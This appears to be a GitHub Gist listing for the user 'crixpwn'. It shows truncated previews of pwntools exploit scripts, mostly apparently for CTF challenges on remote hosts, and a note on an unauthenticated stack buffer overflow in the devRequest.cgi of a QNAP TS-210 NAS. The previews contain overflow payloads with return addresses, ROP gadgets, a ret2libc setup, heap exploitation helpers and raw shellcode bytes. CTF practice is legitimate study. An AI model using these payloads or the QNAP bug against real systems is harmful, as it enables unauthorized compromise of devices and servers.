crixer crixpwn
crixpwn
/ QNAP TS_210 stack based buffer overflow.txt
Last active
October 28, 2017 08:17
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| I recently noticed a bug in QNAP. I have patched this bug on the latest patch. (I did not report it.) My environment was TS-210 and the vulnerability was in devRequest.cgi | |
| And this bug does not require authentication by default. | |
| v0 = CGI_Get_Input(); | |
| dword_27FEC = v0; | |
| v1 = CGI_Find_Parameter(v0, "todo"); | |
| if ( v1 && !strcmp(*(const char **)(v1 + 4), "get_keyfile") && (v2 = CGI_Find_Parameter(dword_27FEC, "password")) != 0 ) | |
| { |
crixpwn
/ ohmybof.py
Created
May 28, 2017 00:47
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| from hexdump import * | |
| #p = process("./ohmybof") | |
| p = remote("223.194.105.182", 41001) | |
| def main(): | |
| popret = 0x80482ad | |
| wr = 0x080483E3 | |
| payload = "A" * 24 |
crixpwn
/ challenge.py
Created
May 28, 2017 00:43
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| r = remote('223.194.105.182',29001) | |
| def main(): | |
| payload = 'A'*204 | |
| payload += p32(0x20f31) | |
| payload += 'A'*192 | |
| payload += p32(0x80485bd) | |
| payload += p32(0x8048980) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| r = remote("223.194.105.182", 22901) | |
| def main(): | |
| payload = "A" * 0x1c | |
| payload += "BBBB" | |
| payload += p32(0x080487F9) | |
| r.send(payload) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| from hexdump import * | |
| r = remote("223.194.105.182", 22900) | |
| def main(): | |
| shellcode = ("\xda\xd4\xba\x11\xf2\x16\x5f\xd9\x74\x24\xf4\x5e\x33\xc9" + | |
| "\xb1\x0d\x31\x56\x18\x03\x56\x18\x83\xee\xed\x10\xe3\x35" + | |
| "\x06\x8d\x95\x98\x7e\x45\x8b\x7f\xf7\x72\xbb\x50\x74\x15" + | |
| "\x3c\xc7\x55\x87\x55\x79\x20\xa4\xf4\x6d\x3c\x2b\xf9\x6d" + |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| from hexdump import * | |
| #p = process("./attackme") | |
| p = remote("223.194.105.182", 37100) | |
| libc = ELF("./libc-2.23.so") | |
| def main(): | |
| read = 0x080483B0 | |
| read_got = 0x804A00C |
crixpwn
/ messnger.py
Created
February 15, 2017 06:13
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| from hexdump import * | |
| import time | |
| p = process("./messenger") | |
| #p = remote("110.10.212.137", 3334) | |
| def leave(size, data): | |
| p.sendline("L") | |
| time.sleep(0.1) |
crixpwn
/ babypwn.py
Created
February 14, 2017 05:49
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| from hexdump import * | |
| import time | |
| #r = remote("localhost", 8889) | |
| r = remote("110.10.212.130", 8889) | |
| def echo(data): | |
| r.sendline("1") | |
| time.sleep(0.1) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| from time import * | |
| from hexdump import * | |
| p = process("./solo") | |
| def malloc(idx, size, data): | |
| p.sendline("1") | |
| p.sendline(idx) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| #p = process("./ez_heap") | |
| p = remote("52.199.49.117", 10003) | |
| def getHeaptr(): | |
| buf = p.recvline() | |
| heaptr = int(buf[:-1], 16) | |
| log.info("heap: " + hex(heaptr)) |
NewerOlder